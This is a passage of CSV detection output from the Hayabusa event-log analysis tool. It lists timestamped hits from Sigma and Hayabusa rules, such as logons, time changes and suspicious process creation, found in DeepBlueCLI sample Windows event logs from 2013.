.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 